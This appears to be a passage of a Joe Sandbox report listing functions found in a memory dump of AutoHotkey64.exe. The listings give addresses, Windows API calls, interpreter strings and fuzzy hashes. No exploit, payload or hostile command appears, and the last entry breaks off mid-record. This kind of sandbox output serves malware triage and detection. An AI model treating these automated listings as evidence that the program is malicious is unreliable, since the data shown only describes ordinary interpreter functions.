Read, xrefs: 000000014004090A
Parameter #2 invalid., xrefs: 00000001400464D3

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID:
String ID: Parameter #2 invalid.$Parameter #3 invalid.$Read
API String ID: 0-931347957
Opcode ID: af9a12873c122162435b902a266b023bd9db6bef9dd9961ca112b09d5a46ed10
Instruction ID: d5ba8251dc6019f7bba31c79ca5976df8c19310c3f6affb1fe1541ee289a1d7b
Opcode Fuzzy Hash: af9a12873c122162435b902a266b023bd9db6bef9dd9961ca112b09d5a46ed10
Instruction Fuzzy Hash: BB229F72704B4086FB668B2BD8403ED33A1E78CBD8F564126EB49676F6DB34C891C749

Function 0000000140043506 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 476windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
free.LIBCMT ref: 00000001400438DB

Strings

Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140043742
Out of memory., xrefs: 0000000140043943

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockfree
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 3390695210-457448710
Opcode ID: e0f302f65134f60071ac04d4296de6018edef22c1530de864307114c0fc8d5ef
Instruction ID: ffefa3b2572ce666edeb55af03b03a4f927a08db1e7048164c976ad6f5c7ecf9
Opcode Fuzzy Hash: e0f302f65134f60071ac04d4296de6018edef22c1530de864307114c0fc8d5ef
Instruction Fuzzy Hash: F922EEB1604B4085FB668B27D4503EC67A2E74CBE8F12522AFB5A57BF5DB78C881C344

Function 000000014002A757 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 000000014002A75A

Strings

Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014002AB46
ErrorLevel, xrefs: 000000014002AA93
Out of memory., xrefs: 000000014002AD83
Script file not found:%s, xrefs: 000000014002A765

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: AttributesFile
String ID: ErrorLevel$Memory limit reached (see #MaxMem in the help file).$Out of memory.$Script file not found:%s
API String ID: 3188754299-3577509769
Opcode ID: b48d50c842d115d515e75c0cdd65db0a1f86a2a964f2c15fe96f9a9a28626494
Instruction ID: 58382c69b5478aeeef0175bd92032b8bcad0eb363e8dc939f250bdfa52762de7
Opcode Fuzzy Hash: b48d50c842d115d515e75c0cdd65db0a1f86a2a964f2c15fe96f9a9a28626494
Instruction Fuzzy Hash: 0D029C76200B8082EB639B26E4503E963A1FB4EBD8F54461AEB4E577B5DF7CC985C340

Function 0000000140042C35 Relevance: 9.4, APIs: 6, Instructions: 368windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fd98259a5ea2e7222548d2064e566cb33687ffcb884aa6b2b62619cd6d78804c
Instruction ID: da70256605d41b22c2ae5f93126d3622f2af31cea311f04a8a2901f013b6f177
Opcode Fuzzy Hash: fd98259a5ea2e7222548d2064e566cb33687ffcb884aa6b2b62619cd6d78804c
Instruction Fuzzy Hash: C0F1BE72B0064086FBA68B27E4403E937A1A78DBD4F564226FB4967AF5DB38C881C744

Function 00000001400BA370 Relevance: 6.1, APIs: 4, Instructions: 137fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE ref: 00000001400BA47D
FindClose.KERNELBASE ref: 00000001400BA491
FindFirstFileW.KERNELBASE ref: 00000001400BA4F9
FindClose.KERNEL32 ref: 00000001400BA50C

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0c46e26afe1cda9787d97d3bc9e892cafc883e079692ec76a87b7afa9c7d5d26
Instruction ID: 7c0e8a139005ced204376094a9c848a8566c487536cf4e7fe569e878b2dda182
Opcode Fuzzy Hash: 0c46e26afe1cda9787d97d3bc9e892cafc883e079692ec76a87b7afa9c7d5d26
Instruction Fuzzy Hash: C0518F22301E8491EA228F16D5487DE72B5FB89BE4F958716BB69077E5EF78C606C300

Function 00000001400962C0 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 589COMMON

Download Yara Rule

Strings

Memory limit reached (see #MaxMem in the help file)., xrefs: 00000001400967AD
Out of memory., xrefs: 0000000140096569, 0000000140096A30

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID:
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-457448710
Opcode ID: 72840c0f2ee05c9b1f862403bb47dff1063c2e97125f2aff930ffc60fcf7fa4f
Instruction ID: 24915e189fdb33fec5283ab8ee4801018f4c40e8dac8f76fe41493a74b65db06
Opcode Fuzzy Hash: 72840c0f2ee05c9b1f862403bb47dff1063c2e97125f2aff930ffc60fcf7fa4f
Instruction Fuzzy Hash: 5442BB72214B8086EB26CF36D5847EA37A5F74CBC8F058216EB5E977A9EB34C591C340

Function 00000001400DC058 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00000001400DC06E
GetVersion.KERNEL32 ref: 00000001400DC080
HeapSetInformation.KERNEL32 ref: 00000001400DC09E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: 41579d430a96526f0b0ce984a5f8c3bc627f9b8fc47ca51f1942b95212c4a718
Instruction ID: b4bcc8232b3e73c3ec718ff6e1e0c4e2eb749b39eab796e8d39494967783a1ee
Opcode Fuzzy Hash: 41579d430a96526f0b0ce984a5f8c3bc627f9b8fc47ca51f1942b95212c4a718
Instruction Fuzzy Hash: 34E0927432278482FB8A5B12A845BD92250FB9C7C0F841818FB0A537B4DE3CC44A8700

Function 0000000140005AE0 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExW.KERNELBASE ref: 0000000140005B05
wcsncpy.LIBCMT ref: 0000000140005E52

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

Strings

/include, xrefs: 0000000140005C19
=, xrefs: 0000000140005BD0
/force, xrefs: 0000000140005BA0
9000, xrefs: 0000000140005DCB
/iLib, xrefs: 0000000140005C64
*#1, xrefs: 0000000140005B10
/Debug, xrefs: 0000000140005D30
localhost, xrefs: 0000000140005DB8
/CP, xrefs: 0000000140005D03
A_Args, xrefs: 0000000140005E38, 0000000140005EF9
/script, xrefs: 0000000140005BF5
/ErrorStdOut, xrefs: 0000000140005BB7
/restart, xrefs: 0000000140005B72

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: FindResource_errno_invalid_parameter_noinfowcsncpy
String ID: *#1$/CP$/Debug$/ErrorStdOut$/force$/iLib$/include$/restart$/script$9000$=$A_Args$localhost
API String ID: 2945227679-1244199565
Opcode ID: cfa2137e05a774ab5083aec045f1c56c92454e58b948e995bf64a3c2b1ade066
Instruction ID: 13101745e00770262a823dd2842bc2129fa1bf4cddbf1b0c85f7dedb0e19a925
Opcode Fuzzy Hash: cfa2137e05a774ab5083aec045f1c56c92454e58b948e995bf64a3c2b1ade066
Instruction Fuzzy Hash: 94D17EB1205B8585FA26EF27F8443EA6360BB4DBC5F884026EF4A572F6EB78C505C710

Function 0000000140028D30 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00000000,?,0000000140005F70), ref: 0000000140028D5F
GetFileAttributesW.KERNELBASE(?,00000000,?,0000000140005F70), ref: 0000000140028E90
GetFileAttributesW.KERNEL32(?,00000000,?,0000000140005F70), ref: 0000000140028EF6
SetCurrentDirectoryW.KERNEL32(?,00000000,?,0000000140005F70), ref: 0000000140028F08
GetFileAttributesW.KERNEL32(?,00000000,?,0000000140005F70), ref: 0000000140028F15
GetFullPathNameW.KERNEL32 ref: 0000000140028FE1

Strings

AutoHotkey v1.1.37.02, xrefs: 0000000140029124
AutoHotkey.chm, xrefs: 0000000140028F0E
- %s, xrefs: 000000014002912B
"ms-its:AutoHotkey.chm::/docs/Welcome.htm", xrefs: 0000000140028F3B
hh.exe, xrefs: 0000000140028F47
.ahk, xrefs: 0000000140028E67
*#1, xrefs: 0000000140029109
Out of memory., xrefs: 000000014002905F
Max, xrefs: 0000000140028F2F

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: File$Attributes$Name$CurrentDirectoryFullModulePath
String ID: - %s$"ms-its:AutoHotkey.chm::/docs/Welcome.htm"$*#1$.ahk$AutoHotkey v1.1.37.02$AutoHotkey.chm$Max$Out of memory.$hh.exe
API String ID: 3122333731-2078679760
Opcode ID: 7ea2de23fba26ae11aeec932cd3b7a3294cf616509acf38ff609ba54d4fd6aed
Instruction ID: 21e7455568d2a7fc857e7806cc1e0bb36ceea1839e164aa03855e8ef2b9faaee
Opcode Fuzzy Hash: 7ea2de23fba26ae11aeec932cd3b7a3294cf616509acf38ff609ba54d4fd6aed
Instruction Fuzzy Hash: C5B1D135201B8596EB72DF26E4553DA33A4F7487D8F844229FB6D476E8EB79CA44C300

Function 00000001400BB4B0 Relevance: 19.7, APIs: 13, Instructions: 164
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000001400BB4E3
EnumResourceNamesW.KERNEL32 ref: 00000001400BB54B
FindResourceW.KERNEL32 ref: 00000001400BB568
LoadResource.KERNEL32 ref: 00000001400BB57D
LockResource.KERNEL32 ref: 00000001400BB58F
GetSystemMetrics.USER32 ref: 00000001400BB5AF
FindResourceW.KERNEL32 ref: 00000001400BB625
LoadResource.KERNEL32 ref: 00000001400BB639
LockResource.KERNEL32 ref: 00000001400BB647
SizeofResource.KERNEL32 ref: 00000001400BB65B
CreateIconFromResourceEx.USER32 ref: 00000001400BB67E
ExtractIconW.SHELL32 ref: 00000001400BB6DA

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Resource$Load$FindIconLock$CreateEnumExtractFromLibraryMetricsNamesSizeofSystem
String ID:
API String ID: 1568753105-0
Opcode ID: ab7e1b83a398312120dd3007bb18900c528e2fec53cf4ea310fbe800d969304f
Instruction ID: cb6f06e9a1a854891161d3e98958ed74d51f725aff5dbed1655aa630e05d9486
Opcode Fuzzy Hash: ab7e1b83a398312120dd3007bb18900c528e2fec53cf4ea310fbe800d969304f
Instruction Fuzzy Hash: 5F518071302F9086EE6A8F57A8107A963A0FB4CBD4F484429EF4A57BA4EB7DCD05C740

Function 000000014004482B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 272
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Delete, xrefs: 000000014004490D
Target label does not exist., xrefs: 0000000140044866
Parameter #1 invalid., xrefs: 0000000140044893
Parameter #2 invalid., xrefs: 000000014004493F
Parameter #1 must not be blank in this case., xrefs: 00000001400448C9

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Delete$Parameter #1 invalid.$Parameter #1 must not be blank in this case.$Parameter #2 invalid.$Target label does not exist.
API String ID: 1623861271-14243736
Opcode ID: c69fcf74374cdc524cf63b674dc8595e20d22b81230af824399c2f21feb8b7fe
Instruction ID: 994b5adb36fccdf2bfa5b809f736dcc2ff0e8f7813bc3a74f3dba73a9e116c85
Opcode Fuzzy Hash: c69fcf74374cdc524cf63b674dc8595e20d22b81230af824399c2f21feb8b7fe
Instruction Fuzzy Hash: 4ED1A1B1604A8485FB62CB27E4543E937A1F38CBD4F52012AEB59A36F6DB78C880C744

Function 0000000140002A35 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 222threadwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001D56
GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002A66
GetWindowThreadProcessId.USER32 ref: 0000000140002A7D
GetClassNameW.USER32 ref: 0000000140002A9F
IsDialogMessageW.USER32 ref: 0000000140002AE1
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002B11
DragFinish.SHELL32 ref: 0000000140003130

Strings

#32770, xrefs: 0000000140002AAC
uQz5, xrefs: 0000000140001D6F

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Window$ClassCountCurrentDialogDirectoryDragFinishForegroundMessageNameProcessThreadTick
String ID: #32770$uQz5
API String ID: 1508145071-580809758
Opcode ID: 30565075c1bc4f972223c8f8dfdc205ca8475fd106f869f557a1c964af213144
Instruction ID: e4e30cd2fb0eb55fbf1d253e54673623406df704291c20216c9637332458a405
Opcode Fuzzy Hash: 30565075c1bc4f972223c8f8dfdc205ca8475fd106f869f557a1c964af213144
Instruction Fuzzy Hash: 40B148B6204B8486FB66CF27A8403E937A1F78DBD4F544116EB4A17BB4EB38D891C700

Function 00000001400DA708 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00000001400DA71A
_FF_MSGBANNER.LIBCMT ref: 00000001400DA785
_FF_MSGBANNER.LIBCMT ref: 00000001400DA7B0
_RTC_Initialize.LIBCMT ref: 00000001400DA7C9
_amsg_exit.LIBCMT ref: 00000001400DA7DD
GetCommandLineW.KERNEL32 ref: 00000001400DA7E2
__wsetargv.LIBCMT ref: 00000001400DA7FB
_amsg_exit.LIBCMT ref: 00000001400DA809
_amsg_exit.LIBCMT ref: 00000001400DA81C
_cinit.LIBCMT ref: 00000001400DA826
_amsg_exit.LIBCMT ref: 00000001400DA831
_wwincmdln.LIBCMT ref: 00000001400DA836

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__wsetargv_cinit_wwincmdln
String ID:
API String ID: 697445056-0
Opcode ID: a9ea5aacdac3bba23c1adccee13ee10df6a06d32d02c0686e25a2f6c278f1120
Instruction ID: b429a3edc3aabe2a50d4530568285da882bfaac9e324fec7ec5be69155eb097c
Opcode Fuzzy Hash: a9ea5aacdac3bba23c1adccee13ee10df6a06d32d02c0686e25a2f6c278f1120
